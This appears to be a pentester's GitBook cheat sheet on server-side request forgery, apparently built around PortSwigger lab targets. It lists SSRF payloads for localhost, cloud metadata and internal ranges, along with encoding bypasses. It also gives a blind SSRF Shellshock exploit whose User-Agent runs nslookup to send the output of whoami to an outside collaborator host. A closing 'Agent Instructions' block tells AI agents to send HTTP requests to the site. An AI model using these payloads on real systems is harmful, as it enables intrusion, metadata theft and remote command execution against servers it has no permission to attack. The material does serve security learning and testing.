# Server-Side Request Forgery (SSRF)

SSRF is a security vulnerability that occurs when an attacker manipulates a server to make HTTP requests to an unintended location. This happens when the server processes user-provided URLs or IP addresses without proper validation.

Common exploitation paths:

* Accessing Cloud metadata
* Leaking files on the server
* Network discovery, port scanning with the SSRF
* Sending packets to specific services on the network, usually to achieve a Remote Command Execution on another server

## **Identify Potential SSRF Entry Points**

🔍 Look for parameters, headers, and input fields that accept URLs:

* URL parameters (`?url=`, `?link=`, `?redirect=`, `?callback=`, `?next=`, etc.)
* JSON / XML body (`"image": "http://example.com/img.jpg"`)
* Headers (`Referer`, `X-Forwarded-For`, `Host`, etc.)
* Hidden form fields (`<input type="hidden" name="webhook_url" value="http://example.com/webhook">`)
* Redirect behavior on function, parameter, field.
* OAuth / API integrations that retrieve external resources

## **Common SSRF Payloads**

<pre class="language-sh"><code class="lang-sh">#Using localhost
http://localhost:80
http://localhost:80/admin
http://localhost:22
https://localhost:443

#Using 127.0.0.1
http://127.0.0.1:80
http://127.0.0.1:22
https://127.0.0.1:443

#Using 0.0.0.0
http://0.0.0.0:80
http://0.0.0.0:22
https://0.0.0.0:443
<strong>
</strong>#Alternative Schemes:
file:// (Read local files)
dict:// (Interacting with dict service)
ftp://, gopher://, sftp:// (Bypass HTTP filters)
<strong>
</strong><strong>#Fetch EC2 metatadata
</strong>http://169.254.169.254/latest/meta-data/
</code></pre>

## Enumerate internal network via SSRF

```
http://192.168.0.x/admin
http://172.16.1.x/admin
http://10.10.x.x:80
```

## Bypass Localhost with on SSRF&#x20;

```sh
#Encode at least one character two/three times and send the request
http://127.0.0.1/%61dmin #<- a is encoded
http://127.0.0.1/%2561dmin
http://127.1/%61dmin
http://127.1/%2561dmin

#Enconde the (#) more than two times and try to use credentials 
http://username@stock.weliketoshop.net/
http://username#@stock.weliketoshop.net/
http://127.0.0.1%25%32%33@stock.weliketoshop.net/admin/delete?username=carlos

#Obfuscation & Encoding:
http://127.0.0.1 → http://2130706433 (Decimal IP)
http://127.0.0.1 → http://0x7f000001 (Hexadecimal)
http://127.0.0.1 → http://127.1 (Shortened IP)
```

{% embed url="<https://www.ipaddressguide.com/ip>" %}

## Blind SSRF with Shellshock exploitation

Burp suite Detection via **collaborator-everywhere pro**

<figure><img src="/files/rtnpEd8AQ7ovkjFWHO7Q" alt=""><figcaption></figcaption></figure>

**Manual Testing every request you visit:**

```
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@wuumc5cpduoqzh107t5wppfif9l1ip7.oastify.
Referer: http://t82jq2qmrr2ndefxlqjt3mtft6zyrmg.oastify.com/ref
X-Originating-IP: spoofed.4v0udddxe2py0p288164qxgqghm8nwc.oastify.com
Client-IP: spoofed.176rpapuqz1vcme5kyi12usnsey50tp.oastify.com
X-Real-IP: spoofed.ufdkx3xnys9okfmysrquan0g076y9my.oastify.com
X-Wap-Profile: http://spli717l8qjmudww2p0sklaea5gwkk9.oastify.com/wap.xml
X-Forwarded-For: spoofed.w52mn5npouzqahc0itgw0pqiq9w01oq.oastify.com
True-Client-IP: spoofed.i0j8iribjguc537mdfbivbl4lvrnhb6.oastify.com
CF-Connecting_IP: spoofed.ei040n071cc8nzpivbted7303r9j07p.oastify.com
From: root@ek242n273ce8pzrixbvef7505rbj47t.oastify.com
X-Client-IP: spoofed.ffy5xox8yd99k0mjscqfa8010s6k08p.oastify.com
Forwarded: for=spoofed.ophe7x7h8mjiu9ws2l0okhaaa1gtbh0.oastify.com;by=spoofed.ophe7x7h8mjiu9ws2l0okhaaa1gtbh0.oastify.com;host=spoofed.ophe7x7h8mjiu9ws2l0okhaaa1gtbh0.oastify.com
Contact: root@1dfrvavuwz7vimk5qyo18uynye460up.oastify.com
```

**Exploit:**

```
GET /product?productId=2 HTTP/2
Host: 0ae1005304d447f3ed42f58400070006.web-security-academy.net
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).k1m0koo7mr2o2l4qe4zig77g278ywokd.oastify.com
Referer: http://192.168.0.X:8080
```

{% embed url="<https://github.com/portswigger/collaborator-everywhere>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://intrusionz3r0.gitbook.io/intrusionz3r0/hacking-web/vulnerabilities/server-side-request-forgery-ssrf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.